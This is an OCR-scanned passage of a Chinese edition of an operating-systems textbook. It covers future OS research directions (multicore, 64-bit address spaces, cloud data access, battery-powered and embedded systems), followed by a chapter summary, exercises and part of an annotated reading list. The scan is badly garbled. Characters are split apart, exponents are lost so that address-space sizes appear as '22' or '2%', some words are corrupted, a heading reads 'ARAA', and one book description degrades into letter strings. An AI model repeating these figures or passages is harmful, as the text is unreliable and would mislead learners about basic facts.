曾经 有 段 时 间 ， 内 存 非 常 缺 乏 ， 以 至 于 编程 者 对 于 每 一 个 Byte 的 内 容 都 知道 得 一 清二 楚 。 现 在 ， 程 
序 员 们 很 少 会 为 浪费 了 几 兆 空间 而 担心 。 对 于 绝 大 多 数 应 用 程序 来 说 ， 内 存 已 经 不 再 是 稀缺 资源 。 如 果 
处 理 器 核心 资源 变 得 同样 丰富 呢 ? 换 句 话说 ， 随 着 制造 商 在 一 个 芯片 上 放置 越 来 越 多 的 处 理 器 核心 ， 多 
到 编程 者 无 需 再 为 处 理 器 核心 的 浪费 而 担心 ， 事 情 会 变 成 什么 样 呢 ? 

一 个 显而易见 的 问题 是 : 要 怎样 利用 所 有 的 处 理 器 核心 ? 如 果 运 行 一 个 每 秒 处 理 数 千 个 客户 端 请 求 
的 普通 服务 器 ， 答 案 可 能 还 相对 简单 。 比 如 ， 可 以 让 每 个 请 求 对 应 到 一 个 核心 上 处 理 。 假 设 运行 中 不 常 
会 遇 到 互 锁 问题 ， 这 种 处 理 也许 还 不 错 。 但 换个 场景 ， 例 如 在 平板 电脑 上 ， 我 们 又 该 怎么 利用 这 么 多 处 
理 器 核心 ? 

另 一 个 问题 是 : 我 们 需要 什么 类 型 的 处 理 器 核心 ?允许 高 频率 乱 序 执行 和 预测 执行 且 具 有 深 流 水 线 
的 超标 量 处 理 器 核心 ， 对 于 执行 顺序 代码 而 言 也 许 非常 不 错 ， 但 是 在 能 耗 上 却 没 那么 好 。 如 果 要 执行 的 
任务 中 包含 大 量 的 并 发 执行 代码 ， 它 们 也 帮 不 上 太 多 的 忙 。 很 多 应 用 程序 如 果 能 够 得 到 更 多 的 小 而 简单 
的 处 理 器 核心 会 运行 得 更 好 。 有 专家 为 异 构 多 核 辩 护 ， 但 是 其 问题 是 相同 的 : 什么 样 的 处 理 器 核心 ? 需 
要 多 少 ? 速度 多 快 ? 这 里 甚至 还 没有 开始 涉及 运行 一 个 操作 系统 及 其 之 上 的 所 有 软件 的 问题 。 操 作 系 统 
会 运行 在 所 有 或 是 部 分 核心 上 ? 网 络 栈 需 要 设置 一 个 还 是 多 个 ?需要 做 到 什么 程度 的 共享 ? 是 否 将 特定 
的 操作 系统 功能 (如 网 络 栈 或 存储 栈 ) 对 应 到 某 些 特定 的 处 理 器 核心 上 完成 ? 如 果 这 样 做 ， 需 不 需要 复 
制 这 些 功 能 来 达到 更 好 的 可 扩展 性 ? 

操作 系统 领域 正在 向 种 种 不 同 的 方向 探索 ， 以 期 得 到 上 述 问 题 的 答案 。 虽 然 研究 者 们 未 必 赞同 这 些 
答案 ， 但 绝 大 多 数 人 还 是 会 同意 : 这 些 都 是 系统 研究 中 令 人 兴奋 的 时 刻 ! 


12.6.3 大 型 地 址 空间 操作 系统 

随 着 计算 机 从 32 位 地 址 空间 转向 64 位 地 址 空间 ， 操 作 系 统 设计 中 的 重大 转变 成 为 可 能 。32 位 地 址 空 
间 并 不 大 。 如 果 你 通过 给 地 球 上 的 每 个 人 提供 他 或 她 自己 的 字 节 来 试图 分 割 22 个 字 节 ， 那 么 将 没有 足够 
的 字 节 可 以 提供 。 相 反 ，2% 大 约 是 2 x 10”。 现 在 每 个 人 可 以 得 到 他 或 她 个 人 的 3GB 大 的 一 块 。 

对 于 2 x 10” 字 节 的 地 址 空间 我 们 能 做 什么 呢 ?” 首 先 ， 可 以 淘汰 文件 系统 概念 。 作 为 替代 ， 所 有 文 
件 在 概念 上 可 以 始终 保存 在 (虚拟 ) 内 存 中 。 毕 竟 在 那里 存在 足够 的 空间 ， 可 以 放下 超过 10 亿 部 全 长 的 
电影 ， 每 一 部 压缩 到 4GB。 

另 一 个 可 能 的 用 途 是 永久 对 象 存 储 。 对 象 可 以 在 地 址 空间 中 创建 ， 并 且 保 存在 那里 直到 所 有 对 它们 
的 引用 消失 ， 在 此 时 它们 可 以 自动 被 删除 。 这 样 的 对 象 在 地 址 空间 中 是 永久 的 ， 甚 至 是 在 关机 和 重新 启 
动 计算 机 的 时 候 。 有 了 64 位 的 地 址 空间 ， 在 用 光 地 址 空间 之 前 ， 可 以 用 每 秒 100MB 的 速率 创建 对 象 长 达 
5000 年 。 当 然 ， 为 了 实际 存储 这 么 大 量 的 数据 ， 需 要 许多 磁盘 存储 器 用 于 分 页 交换 ， 但 是 在 历史 上 这 是 
第 一 次 限制 因素 是 磁盘 ， 而 不 是 地 址 空间 。 

由 于 大 量 数 目的 对 象 在 地 址 空间 中 ， 人 允许 多 个 进程 同时 在 相同 的 地 址 空间 中 运行 ， 以 便 以 一 般 的 方式 
共享 对 象 就 变 得 十 分 有 趣 了 。 这 样 的 设计 显然 会 通 向 与 我 们 现在 所 使 用 的 操作 系统 完全 不 同 的 操作 系统 。 

就 64 位 地 址 而 言 ， 另 一 个 必须 重新 思考 的 操作 系统 问题 是 虚拟 内 存 。 对 于 2% 字 节 的 虚拟 地 址 空间 
和 8KB 的 页 面 ， 我 们 有 23 个 页 面 。 常 规 的 页 表 不 能 很 好 地 按 比例 变换 到 这 样 的 大 小 ， 所 以 需要 别 的 东西 。 
反 转 的 页 表 是 可 行 的 ， 但 是 也 有 人 提出 了 其 他 的 想法 (Talluri 等 人 ，1995)。 无 论 如 何 ，64 位 操作 系统 
为 新 的 研究 提供 了 大 量 的 余地 。 


12.6.4 无 缝 的 数据 访问 

自从 计算 时 代 的 黎明 降临 ， 这 人 台 设 备 与 那 台 设备 始终 是 有 区 别 的 。 也 就 是 说 ， 如 果 数 据 在 这 人 台 设 备 
上 ， 你 就 无 法 从 那 台 设 备 上 访问 数据 ， 除 非 你 事先 进行 了 数据 传输 。 同 样 ， 即 使 你 有 数据 ， 在 安装 了 正 
确 的 软件 之 前 也 无 法 使 用 它 。 这 种 模型 现在 正在 发 生变 化 。 

现 如 今 ， 用 户 希望 能 够 在 任意 地 点 任意 时 间 访 问 更 多 的 数据 。 典 型 的 实现 方式 是 使 用 存储 服务 (如 
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Dropbox, GoogleDrive, iCloud#SkyDrive) 将 数据 存储 在 云端 。 所 有 存放 在 云端 的 文件 可 以 通过 连接 
到 网 络 的 任意 设备 访问 。 此 外 ， 访 问 数据 的 程序 常常 也 驻 留 在 云端 ， 所 以 甚至 不 需要 安装 这 些 程序 。 这 
种 方式 允许 用 户 轻易 地 通过 智能 手机 使 用 与 修改 文档 文件 、 表 格 文件 、 演 示 文 稿 文件 。 一 般 而 言 ， 这 被 
视 为 是 一 种 进步 。 

要 无 颖 地 实现 上 述 数据 访问 很 复杂 ， 需 要 在 系统 底层 做 大 量 聪明 的 改动 。 例 如 ， 如 果 没 有 网 络 连 接 
该 怎么 办 ? 显然 你 不 想 让 用 户 无 法 正常 使 用 。 当 然 ， 可 以 在 本 地 缓存 所 做 的 修改 ， 并 在 网 络 连 接 重新 建 
立时 更 新 文件 ， 但 假如 有 多 个 设备 做 了 有 冲突 的 修改 呢 ? 这 在 多 用 户 共享 数据 时 是 一 个 很 常见 的 问题 ， 
但 也 可 能 在 一 个 用 户 的 情况 下 发 生 。 另 外 ， 如 果 文 件 很 大 ， 你 肯定 不 愿意 在 进行 访问 前 等 待 很 长 的 时 间 。 
高 速 缓存 、 预 加 载 和 同步 是 关键 。 现 在 的 操作 系统 在 合并 多 台 设备 数据 时 采用 有 颖 的 方式 〈 假 设 “ 有 颖 ” 
与 “无 颖 ”相反 )。 我 们 肯定 可 以 做 得 更 好 。 


12.6.5 电池 供电 的 计算 机 

功能 强大 的 桌面 计算 机 可 拥有 64 位 地 址 空间 、 高 带宽 网 络 、 多 处 理 器 以 及 高 品质 的 音频 和 视频 ， 这 
已 经 成 为 现在 桌面 系统 的 标准 ， 并 且 正 在 快速 地 成 为 笔记 本 电脑 、 平 板 电脑 甚至 智能 手机 的 标准 。 随 着 
这 种 趋势 的 流行 ， 它 们 的 操作 系统 必然 与 目前 的 操作 系统 有 重大 的 区 别 ， 以 便 处 理 这 些 需求 。 除 此 之 外 ， 
它们 还 必须 做 到 耗 能 与 降温 的 平衡 。 散 热 和 能 耗 即 使 在 高 端 计算 机 中 也 是 最 重要 的 挑战 之 一 。 

然而 ， 市 场 上 增长 甚至 更 快 的 部 分 是 电池 供电 的 计算 机 ， 包 括 笔记 本 电脑 、 掌 上 机 、Webpad、100 
美元 的 膝 上 机 以 及 智能 手机 。 它 们 中 的 绝 大 部 分 机 种 拥有 与 外 部 世界 的 无 线 连接 ， 并 且 需 要 比 当前 高 端 
设备 更 加 小 巧 、 快 速 、 灵 活 和 可 靠 的 操作 系统 。 现 今 的 很 多 这 种 设备 都 是 基于 传统 操作 系统 的 ， 如 
Linux、Windows 和 OS X， 不 过 做 了 显著 的 修改 。 此 外 ， 它 们 还 频繁 地 使 用 微 内 核 机 制 /基于 管理 程序 的 
策略 来 管理 射频 栈 。 这 些 操作 系统 必须 处 理 完全 连接 (导线 连接 )、 弱 连接 (无 线 连接 ) 和 非 连接 操作 ， 
包括 离线 前 的 数据 存储 和 返回 在 线 时 的 一 致 性 分 析 ， 这 些 都 要 比 当前 的 系统 更 好 。 未 来 它们 还 必须 能 比 
当前 的 系统 更 好 地 处 理 移动 问题 (例如 找到 一 台 激 光 打 印 机 并 登录 , 然后 通过 无 线 电 波 把 文件 发 送 给 它 )。 
电源 管理 是 必需 的 ， 这 包括 在 操作 系统 与 应 用 程序 之 间 关 于 剩余 多 少 电池 电量 以 及 电池 如 何 最 好 利用 的 
大 量 对 话 框 。 动 态 地 改装 应 用 程序 以 处 理 微小 屏幕 的 局 限 可 能 变 得 十 分 重要 。 最 后 ， 新 的 输入 和 输出 模 
式 (包括 手写 和 语音 ) 可 能 需要 操作 系统 的 新 技术 以 改善 品质 。 电 凶 供 电 、 手 持 无 线 、 语 音 操作 的 计算 
机 ， 与 具有 4 个 64 位 CPU 的 多 处 理 器 以 及 Gigabit 光 纤 网 络 连接 的 桌面 系统 ， 两 者 的 操作 系统 有 可 能 显著 
不 同 。 当 然 ， 还 存在 无 数 的 混交 机 种 ， 它 们 也 具有 自己 的 需求 。 

对 于 Web 的 访问 现在 需要 特殊 的 程序 (浏览 器 ) ， 将 来 可 能 会 以 一 种 无 颖 的 方式 完全 集成 到 操作 系 
统 中 。 存 储 信息 的 标准 方式 可 能 会 变 为 Web 页 面 ， 并 且 这 些 页 面 可 能 包含 各 种 各 样 的 非 文 本 项 目 ， 包 括 
音频 、 视 频 、 程 序 以 及 其 他 ， 它 们 全 部 作为 操作 系统 的 基本 数据 而 管理 。 


12.6.6 ARAA 

新 型 操作 系统 将 高 速 增长 的 最 后 一 个 领域 是 嵌入 式 系统 。 处 于 洗衣 机 、 微 波 炉 、 玩 具 、 晶 体 管 收音 
机 、MP3 播 放 器 、 便 携 式 摄像 机 、 电 梯 以 及 心脏 起 搏 器 内 部 的 操作 系统 将 不 同 于 上 面 的 所 有 操作 系统 ， 
并 且 很 可 能 相互 之 间 也 不 相同 。 每 个 操作 系统 或 许 都 需要 仔细 地 剪裁 以 适应 其 特定 的 应 用 ， 因 为 任何 人 
都 不 大 可 能 将 一 块 PCI 卡 插入 心脏 起 搏 器 将 其 变 成 一 个 电梯 控制 器 。 由 于 所 有 的 嵌入 式 系统 在 设计 时 就 
知道 它 只 运行 有 限 数目 的 程序 ， 所 以 对 其 进行 优化 是 可 能 的 ， 而 这 样 的 优化 在 通用 系统 中 是 做 不 到 的 。 

对 于 峰 入 式 系 统 而 言 ， 一 种 有 希望 的 思路 是 可 扩展 的 操作 系统 (例如 Paramecium 和 Exokernel) 。 这 
些 操 作 系统 可 以 随 着 应 用 程序 的 需要 而 被 构建 成 轻 量 级 的 或 重量 级 的 ， 但 是 以 一 种 应 用 程序 间 一 致 的 方 
式 。 因 为 嵌入 式 系统 将 以 上 亿 的 量 级 生产 ， 所 以 对 于 新 型 操作 系统 而 言 这 是 一 个 主要 的 市 场 。 
12.7 小 结 

操作 系统 的 设计 开始 于 确定 它 应 该 做 什么 。 接 口 应 该 是 简单 、 完 备 且 高 效 的 。 应 该 拥有 一 个 清晰 的 
用 户 界面 范 型 、 执 行 范 型 和 数据 范 型 。 

系统 应 该 具有 良好 的 结构 ， 使 用 若干 种 已 知 技术 中 的 一 种 ， 例 如 分 层 结构 或 客户 -服务 器 结构 。 内 
部 组 件 应 该 是 相互 正 交 的 ， 并 且 要 清楚 地 分 离 策略 与 机 制 。 大 量 的 精力 应 该 投入 到 诸如 静态 与 动态 数据 
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结构 、 命 名 、 绑 定时 机 以 及 模块 实现 次 序 这 样 的 一 些 问题 上 。 

性 能 是 重要 的 ,但 是 优化 应 该 仔细 地 选择 ， 从 而 使 优化 不 至 于 破坏 系统 的 结构 。 空 间 一 时 间 权 衡 、 
高 速 缓存 、 线 索 、 利 用 局 部 性 以 及 优化 常见 的 情况 等 技术 通常 都 值得 尝试 。 

两 三 个 人 编写 一 个 系统 与 300 个 人 生产 一 个 大 型 系统 是 不 同 的 。 在 后 一 种 情况 下 ， 团 队 结构 和 项 目 


管理 对 于 项 目的 成 败 起 着 至 关 重要 的 作用 。 


最 后 ， 操 作 系统 正在 进行 变革 以 跟 上 新 的 趋势 和 迎接 新 的 挑战 。 这 些 趋势 和 挑战 包括 基于 管理 程序 
的 系统 、 多 核 系 统 、64 位 地 址 空间 、 掌 上 无 线 计算 机 、 和 伐 信 式 系统 。 训 无 疑问 ， 对 于 操作 系统 设计 人 员 


来 说 今后 几 年 将 十 分 令 人 激动 。 
习题 


1. 摩尔 定律 (Moore's law) 描述 了 一 种 指数 增长 
现象 ， 类 似 于 将 一 个 动物 物种 引入 到 具有 充足 
食物 并 且 没 有 天 敌 的 新 环境 中 生长 。 本 质 上 ， 
随 着 食物 供应 变 得 有 限 或 者 食肉 动物 学 会 了 捕 
食 新 的 被 捕食 者 ， 一 条 指数 增长 曲线 可 能 最 终 
成 为 一 条 具有 一 个 渐进 极限 的 S 形 曲线 。 讨 论 可 
能 最 终 限 制 计算 机 硬件 改进 速率 的 因素 。 

2. 图 13-1 显 示 了 两 种 范 型 : 算法 范 型 和 事件 驱动 
范 型 。 对 于 下 述 每 一 种 程序 ， 哪 一 范 型 可 能 更 
容易 使 用 : 

(a) 编译 器 
(b) 照片 编辑 程序 
(c) 工资 单程 序 

3. 在 某 些 早期 的 苹果 Macintosh 计 算 机 上 ，GUI 代 
码 是 在 ROM 中 的 。 为 什么 ? 

4. Corbat6 的 格言 是 系统 应 该 提供 最 小 机 制 。 这 里 
是 一 份 POSIX 调 用 的 列表 ， 这 些 调用 也 存在 于 
UNIX 版 本 7 中 。 哪 些 是 元 余 的 ? 换 句 话说 ， 哪 
些 可 以 被 删除 而 不 损失 功能 性 ， 因 为 其 他 调用 
的 简单 组 合 可 以 做 同样 的 工作 并 具有 大 体 相 同 
的 性 能 。access、alarm、chdir、chmod、chown、 
chroot、close、creat、dup、exec、exit、fcntl、 
fork, fstat, ioctl, kill, link, Iseek, mkdir, 
mknod, open, pause, pipe, read, stat, time, 
times, umask, unlink, utime, wait#{Iwrite, 

.假设 图 12-2 中 层次 3 和 层次 4 互 换 ， 对 系统 的 设 
计 会 有 什么 影响 ? 

6. 在 一 个 基于 微 内 核 的 客户 一 服务 器 系统 中 ， 微 
内 核 只 做 消息 传递 而 不 做 其 他 任何 事情 。 用 户 
进程 仍然 可 以 创建 和 使 用 信号 量 吗 ? 如 果 是 ， 
怎样 做 ? 如果 不 是 ， 为 什么 不 能 ? 

.细致 的 优化 可 以 改进 系统 调用 的 性 能 。 考 虑 这 
样 一 种 情况 ， 一 个 系统 调用 每 10ms 调 用 一 次 ， 
一 次 调用 花费 的 平均 时 间 是 2ms。 如 果 系 统 调 
用 能 够 加 速 两 倍 ， 花 费 10s 的 一 个 进程 现在 要 花 
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费 多 少时 间 运 行 ? 

8. 操作 系统 经 常 在 外 部 和 内 部 这 两 个 不 同 的 层次 上 

实现 命名 。 这 些 名 字 就 如 下 性 质 有 什么 区 别 ? 

(a) 长 度 
(b) 唯一 性 
(c) 层次 结构 

. 处理 大 小 事先 未 知 的 表格 的 一 种 方法 是 将 其 大 

小 固定 ， 但 是 当 表格 填 满 时 ， 用 一 个 更 大 的 表 

格 取代 它 ， 并 且 将 旧 的 表 项 复制 到 新 表 中 ， 然 

后 释放 旧 的 表格 。 使 新 表 的 大 小 是 原始 表格 大 

小 的 2 倍 ， 与 新 表 的 大 小 只 是 原始 表格 大 小 的 

1.5 倍 相 比 ， 有 什么 优点 和 缺点 ? 

10. 在 图 12-5 中 ， 标 志 found 用 于 表明 是 否 找到 一 

个 PID。 忽 略 found 而 只 是 在 循环 的 结尾 处 测试 

P 以 了 解 是 否 到 达 结 尾 ， 这 样 做 可 行 吗 ? 

.在 图 13-6 中 ， 条 件 编译 隐藏 了 Pentium 与 Ultra 

SPARC 的 区 别 。 相 同 的 方法 可 以 用 于 隐藏 拥有 

一 块 IDE 磁 盘 作 为 唯一 磁盘 的 Pentium 与 拥有 一 

块 SCSI 磁 盘 作 为 唯一 磁盘 的 Pentium 之 间 的 区 

别 吗 ? 这 是 一 个 好 的 思路 吗 ? 

12. 引用 是 使 一 个 算法 更 加 灵活 的 一 种 方法 。 它 有 
缺点 吗 ? 如 果 有 的 话 ， 有 哪些 缺点 ? 

13. 可 重 和 的 过 程 能 够 拥有 私有 静态 全 局 变量 吗 ? 
讨论 你 的 答案 。 

14. 图 12-7b 中 的 宏 显 然 比 图 12-7a 中 的 过 程 效率 更 
高 。 然 而 ， 它 的 一 个 缺点 是 难于 阅读 。 它 还 存 
在 其 他 缺点 吗 ? 如果 有 的 话 ， 还 有 哪些 缺点 ? 

15. 假设 需要 一 种 方法 来 计算 一 个 32 位 字 中 1 的 个 
数 是 奇数 还 是 偶数 。 请 设计 一 种 算法 尽 可 能 快 
地 执行 这 一 计算 。 如 果 必 要 ， 可 以 使 用 最 大 
256KB 的 RAM 来 存放 各 种 表 。 编 写 一 个 宏 实 
现 你 的 算法 。 附 加 分 : 编写 一 个 过 程 通过 在 32 
个 位 上 进行 循环 来 做 计算 。 测 量 一 下 你 的 宏 比 
过 程 快 多 少 倍 。 

16. 在 图 12-8 中 ， 我 们 看 到 GIF 文 件 如 何 使 用 8 位 的 
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值 作为 索引 检索 一 个 调 色 板 。 相 同 的 思路 可 以 
用 于 16 位 宽 的 调 色 板 。 在 什么 情况 下 (如果 有 
的 话 )，24 位 的 调 色 板 是 一 个 好 的 思路 ? 

17. GIF 的 一 个 缺点 是 图 像 必 须 包含 调 色 板 ， 这 会 
增加 文件 的 大 小 。 对 于 一 个 8 位 宽 的 调 色 板 而 
言 ， 达 到 收 支 平 衡 的 最 小 图 像 大 小 是 多 少 ? 对 
于 16 位 宽 的 调 色 板 重复 这 一 问题 。 

18. 在 正文 中 ， 我 们 展示 了 对 路 径 名 进行 高 速 缓存 
使 得 当 查 找 路 径 名 时 可 以 显著 地 加 速 。 有 时 使 
用 的 另 一 种 技术 是 让 一 个 守护 程序 打开 根 目 录 
中 的 所 有 文件 ， 并 且 保持 它们 永久 地 打开 ， 为 
的 是 迫使 它们 的 i 节点 始终 处 于 内 存 中 。 像 这 
样 钉 住 i 节 点 可 以 进一步 改进 路 径 查 找 吗 ? 

19. 即使 一 个 远程 文件 因为 记录 了 一 个 线索 而 没有 被 
删除 , 它 也 可 能 在 最 后 一 次 引用 之 后 发 生 了 改变 。 
有 哪些 可 能 有 用 的 其 他 信息 要 记录 ? 

20. 考虑 一 个 系统 ， 它 将 对 远程 文件 的 引用 作为 线 
索 而 储藏 ， 例 如 形 如 (名字 ， 远 程 主机 ， 远 程 
名 字 )。 一 个 远程 文件 悄悄 地 被 删除 然后 被 取 
代 是 可 能 的 。 那 么 线索 将 取 回 错误 的 文件 。 怎 
样 才能 使 这 一 问题 尽 可 能 少 地 发 生 ? 

21. 我 们 在 正文 中 阐述 了 局 部 性 经 常 可 以 被 用 来 改 
进 性 能 。 但 是 ， 考 虑 一 种 情况 ， 其 中 一 个 程序 
从 一 个 数据 源 读 取 输 入 并 且 连 续 地 输出 到 两 个 
或 多 个 文件 中 。 试 图 利用 文件 系统 中 的 局 部 性 
在 这 里 可 能 会 导致 效率 的 降低 吗 ? 存在 解决 这 
一 问题 的 方法 吗 ? 

22. Fred Brooks 声 称 一 名 程序 员 每 年 只 能 编写 1000 
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行 调试 好 的 代码 ， 然 而 MINIX 的 第 一 版 
(13 000 行 代码 ) 是 一 个 人 在 3 年 之 内 创作 的 。 
怎样 解释 这 一 矛盾 ? 

.使 用 Brooks 每 名 程序 员 每 年 1000 行 的 数字 ， 估 

计生 产 Windows Vista 花 费 的 资金 数量 。 假 设 

一 名 程序 员 每 年 的 成 本 是 100 000 美 元 (包括 

日 常 开 销 ， 例 如 计算 机 、 办 公 空间 、 秘 书 支持 

以 及 管理 开销 ) 。 你 相信 这 一 答案 吗 ? 如 果 不 

相信 ， 什 么 地 方 有 错误 ? 

24. 随 着 内 存 越 来 越 便宜 ， 可 以 设想 一 台 计算 机 拥 
有 巨大 容量 的 电池 供电 的 RAM 来 取代 硬盘 。 
以 当前 的 价格 ， 仅 有 RAM 的 低 端 PC 成 本 是 多 
少 ? 假设 1GB 的 RAM 盘 对 于 低 端 机 器 是 足够 
的 。 这 样 的 机 器 有 竞争 力 吗 ? 

25. 列举 某 个 装置 内 部 的 嵌入 式 系统 中 不 需要 用 到 
的 常规 操作 系统 的 某 些 功 能 特性 。 

26. 使 用 C 编 写 一 个 过 程 ， 在 两 个 给 定 的 参数 上 做 
双 精 度 加 法 。 使 用 条 件 编译 编写 该 过 程 ， 使 它 
既 可 以 在 16 位 机 器 上 工作 ， 也 可 以 在 32 位 机 器 
ETHE 

27. 编写 程序 ， 将 随机 生成 的 短 字 符 串 输入 到 一 
个 数组 中 ， 然 后 使 用 下 述 方法 在 数组 中 搜索 
给 定 的 字符 串 : (a) 简单 的 线性 搜索 ( 蛮 力 法 )， 
(b) 自选 的 更 加 复杂 的 方法 。 对 于 从 小 型 数组 
到 你 的 系统 所 能 处 理 的 最 大 数组 这 样 的 数组 大 
小 范围 重新 编译 你 的 程序 。 评 估 两 种 方法 的 性 
能 。 收 支 平 衡 点 在 哪里 ? 

28. 编写 一 个 在 内 存 模 拟 中 的 文件 系统 。 
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参考 书目 与 文献 


在 之 前 的 12 章 中 我 们 已 经 涉及 了 多 个 主题 。 本 章 的 目的 在 于 向 那些 希望 对 操作 系统 进行 进一步 研 
究 的 读者 提供 一 些 帮 助 。13.1 节 列 出 了 向 读者 推荐 的 阅读 材料 ，13.2 节 按 照 字 母 顺 序列 出 了 本 书 中 所 引 
用 的 所 有 书籍 和 文章 。 

除了 下 面 给 出 的 参考 书目 以 外 ， 奇 数 年 份 举行 的 ACM 操作 系统 原理 学 术 会 议 (Symposium 
on Operating Systems Principles, SOSP) 和 偶数 年 份 举行 的 USENIX 操作 系统 设计 与 实现 学 术 会 议 
( Symposium on Operating Systems Design and Implementation, OSDI) 也 是 了 解 目前 操作 系统 领域 研 
究 工作 的 很 好 渠道 。 一 年 一 度 的 Eurosys 200x 会 议 也 有 一 流 的 文章 。 还 可 以 在 4CM Transactions on 
Computer Systems 和 ACM SIGOPS Operating Systems Review 两 份 杂志 中 找到 一 些 相 关 的 文章 。 另 外 
ACM、IEEE 和 USENIX 的 许多 会 议 也 涉及 有 关 的 内 容 。 


13.1 进行 深入 阅读 的 建议 

在 以 下 各 小 节 中 ， 我 们 给 出 一 些 深入 阅读 的 建议 。 与 本 书 中 标题 为 “有关 …… 的 研究 ”小 节 中 引用 
的 那些 有 关 当前 研究 工作 的 文章 不 同 ， 这 些 参考 资料 实际 上 多 数 属于 入 门 和 培训 一 类 的 。 不 过 ， 可 以 把 
它们 看 作 本 书 中 所 介绍 内 容 的 不 同 视 角 和 不 同 侧重 点 。 


13.1.1 引 论 

Silberschatz et al., Operating System Concept, 9th ed. 

一 本 关于 操作 系统 的 教材 ， 涵 盖 了 进程 、 内 存 管理 、 存 储 管理 、 安 全 与 保护 、 分 布 式 系统 和 一 些 专 
用 系统 等 方面 的 内 容 。 书 里 面 给 出 了 两 个 学 习 案例 : Linux 和 Windows 7, BWE E E EW TER 
古老 的 物种 ， 寓 意 着 操作 系统 这 项 研究 也 已 日 久 年 深 。 

Stallings, Operating Systems, 7th ed. 

这 是 有 关 操 作 系 统 的 另 一 本 教科 书 。 它 涵盖 了 所 有 传统 的 内 容 ， 还 包括 少量 分 布 式 系统 的 内 容 。 

Stevens and Rago, Advanced Programming in the UNIX Environment 

该 书 叙 述 如 何 使 用 UNIX 系统 调用 接口 以 及 标准 CERS C 程序 。 有 基于 System V 第 4 版 以 及 
UNIX 4.4 BSD 版 的 例子 。 有 关 这 些 实现 与 POSIX 的 关系 在 书 中 有 具体 叙述 。 

Tanenbaum and Woodhull, Operating Systems Design and Implementation 

一 个 通过 动手 实践 来 学 习 操 作 系 统 的 方法 。 这 本 书 主要 介绍 了 一 些 常 见 的 原理 ， 另 外 详细 介绍 了 一 
个 真实 的 操作 系统 一 MINIX3， 并 且 附 带 了 这 个 操作 系统 的 清单 。 


13.1.2 ”进程 与 线程 

Arpaci-Dusseau and Arpaci-Dusseaum, Operating Systems: Three Easy Pieces 

书 中 的 第 一 部 分 专注 于 CPU 的 虚拟 化 ， 从 而 使 多 线程 能 够 共享 CPU。 这 本 书 的 优点 在 于 (不 仅 在 
于 实际 上 有 线 上 的 免费 版 )， 它 不 仅 介绍 了 关于 进程 和 进程 调度 方法 的 概念 ， 同 样 还 有 关于 API 以 及 系统 
调用 fork 和 exec 的 详细 介绍 。 

Andrews and Schneider, Concepts and Notations for Concurrent Programming 

这 是 一 本 关于 进程 和 进程 间 通 信 的 教程 ， 包 括 忙 等 待 、 信 号 量 、 管 程 、 消 息 传递 以 及 其 他 技术 。 文 
章 中 同时 也 说 明了 这 些 概 念 是 如 何 嵌 入 到 不 同 编程 语言 中 去 的 。 这 篇 文章 非常 老 ， 但 是 却 经 受 住 了 时 间 
的 考验 。 

Ben-Ari, Principles of Concurrent Programming 

这 本 书 专门 讨论 了 进程 间 的 通信 和 问题， 其 他 章节 则 讨论 了 互 斥 性 、 信 和 号 量 、 管 程 以 及 哲学 家 就 餐 问 
题 等 。 同 样 ， 这 么 多 年 来 它 也 经 受 住 了 时 间 的 考验 。 


Zhuravlev et al., Survey of Scheduling Techniques for Addressing Shared Resources in Multicore 
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Processors 

多 核 系统 已 经 开始 主导 通用 计算 领域 。 其 中 最 大 的 挑战 之 一 是 对 共享 资源 的 竞争 。 在 这 篇 报告 中 ， 
作者 提出 了 处 理 这 种 竞争 的 不 同调 度 技术 。 

Silberschatz et al., Operating System Concepts , 9th ed. 

该 书 第 3~6 章 讨论 了 进程 与 进程 间 通信 ， 包 括 调度 、 临 界 区 、 信 号 量 、 管 程 以 及 经 典 的 进程 间 通 信 
问题 。 

Stratton et al., Algorithm and Data Optimization Techniques for Scaling to Massively Threaded Systems 

编写 一 个 拥有 六 个 线程 的 系统 是 非常 困难 的 。 那 么 当 你 有 成 千 上 万 的 线程 时 会 发 生 什 么 呢 ? 说 它 是 
复杂 的 是 为 了 将 它 变 得 简单 。 这 篇 文章 讨论 了 一 些 实践 方法 。 
13.1.3 ”内 存 管理 

Denning, Virtual Memory 

该 文 是 一 篇 关于 虚拟 内 存 诸多 特性 的 经 典 文章 。 作 者 Denning 是 该 领域 的 先驱 之 一 ， 正 是 他 创立 了 
工作 集 概念 。 

Denning, Working Sets Past and Present 

该 书 很 好 地 阐述 了 大 容量 存储 器 的 管理 和 页 面 置换 算法 。 书 后 附 有 完整 的 参考 文献 。 虽 然 其 中 很 多 
文章 都 非常 老 了 ， 但 是 原理 实际 根本 没有 变化 。 

Knuth, The Art of Computer Programming, Vol. 1 

该 书 讨论 并 比较 了 首次 适 配 算法 、 最 佳 适 配 算法 和 其 他 一 些 存储 管理 算法 。 

Arpaci-Dusseau and Arpaci-Dusseaum, Operating Systems: Three Easy Pieces 

这 本 书 的 第 12、13 章 有 大 量 关 于 虚拟 内 存 的 内 容 ， 其 中 包括 对 页 面 置换 策略 的 综述 。 
13.1.4 文件 系统 

McKusick et al, A Fast File System for UNIX 

在 4.2 BSD 环境 下 重新 实现 了 UNIX 的 文件 系统 。 该 文 描述 了 新 文件 系统 的 设计 ， 并 把 重点 放 在 其 
性 能 上 。 

Silberschatz et al, Operating System Concepts, 9th ed. 

该 书 第 10~12 章 与 文件 系统 有 关 ， 涉 及 文件 操作 、 文 件 访问 方式 、 目 录 、 实 现 以 及 其 他 内 容 。 

Stallings, Operating Systems, 7th ed 

该 书 第 12 章 包括 许多 有 关 文 件 系 统 的 内 容 ， 还 有 一 些 有 关 安 全 的 内 容 。 

Cornwell, Anatomy of a Solid-state Drive 

如 果 你 对 固态 硬盘 感 兴趣 ， 那 么 Michael Cornwell 的 介绍 是 一 个 不 错 的 起 点 。 特 别 是 作者 简单 介绍 
了 传统 硬盘 与 SSD 的 区 别 。 


13.1.5 输入 /输出 

Geist and Daniel, A Continuum of Disk Scheduling Algorithms 

该 文 给 出 了 一 个 通用 的 磁盘 臂 调度 算法 ， 并 给 出 了 详细 的 模拟 和 实验 结果 。 

Scheible, A Survey of Storage Options 

现在 存储 的 方法 很 多 : DRAM, SRAM, SDRAM, WAF, 硬盘 ， 软 盘 , CD-ROM, DVD， 还 有 磁带 等 。 
这 篇 文章 对 这 些 技 术 进 行 了 研究 ， 着 重 总 结 了 它们 的 优 缺 点 。 

Stan and Skadron, Power-Aware Computing 

能 源 问题 始终 是 移动 设备 的 主要 问题 ， 直 到 有 人 能 设法 将 摩尔 定律 运用 于 电池 技术 为 止 。 能 源 和 温 
